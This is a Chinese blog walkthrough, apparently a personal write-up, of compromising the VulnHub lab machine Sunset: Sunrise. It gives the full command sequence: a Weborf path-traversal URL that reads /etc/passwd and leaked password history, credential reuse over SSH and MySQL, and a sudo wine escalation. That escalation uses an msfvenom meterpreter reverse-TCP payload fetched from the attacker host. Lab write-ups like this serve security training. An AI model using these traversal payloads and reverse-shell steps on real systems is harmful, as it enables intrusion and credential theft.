PJzhang:vulnhub靶機sunset系列SUNSET:SUNRISE

貓寧~~~

 

地址：http://www.vulnhub.com/entry/sunset-sunrise,406/

關注工具和思路。

nmap 192.168.43.0/24
靶機IP
192.168.43.11

nmap -A -p1-65535 192.168.43.11

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nginx 1.14.2
3306/tcp open mysql
8080/tcp open http-proxy http-proxy Weborf (GNU/Linux)

http://192.168.43.11/
http://192.168.43.11:8080/，獲知Weborf/0.12.2 (GNU/Linux)

Weborf/0.12.2存在目錄遍歷漏洞
https://www.exploit-db.com/exploits/14925

查看用戶列表
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

關注
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash

查看家目錄，正好是上述兩個用戶
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2f

dirb http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf

如下可以訪問
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.profile

http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.mysql_history
顯示ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';

http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.bashrc

ssh [email protected]，輸入iheartrainbows44，進入

uname -a
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux

mysql -uweborf -p，密碼還是iheartrainbows44

show databases;
use mysql;
show tables;
select Host,User,Password from user;

localhost | sunrise | thefutureissobrightigottawearshades

su sunrise，輸入密碼thefutureissobrightigottawearshades，sunrise@sunrise:/home/weborf$

sudo -l
獲知(root) /usr/bin/wine

提權信息收集程序
https://github.com/sleventyeleven/linuxprivchecker

msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none lhost=192.168.43.154 lport=4444 >muma.exe

python3 -m http.server 80

進入靶機
wget http://192.168.43.154/muma.exe

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

sudo /usr/bin/wine muma.exe
密碼thefutureissobrightigottawearshades

直接獲取shell
meterpreter >

cd /root
cat.root.txt
24edb59d21c273c033aa6f1689b0b18c

或者直接在靶機執行sudo /usr/bin/wine cmd.exe
cd /root
type root.txt
24edb59d21c273c033aa6f1689b0b18c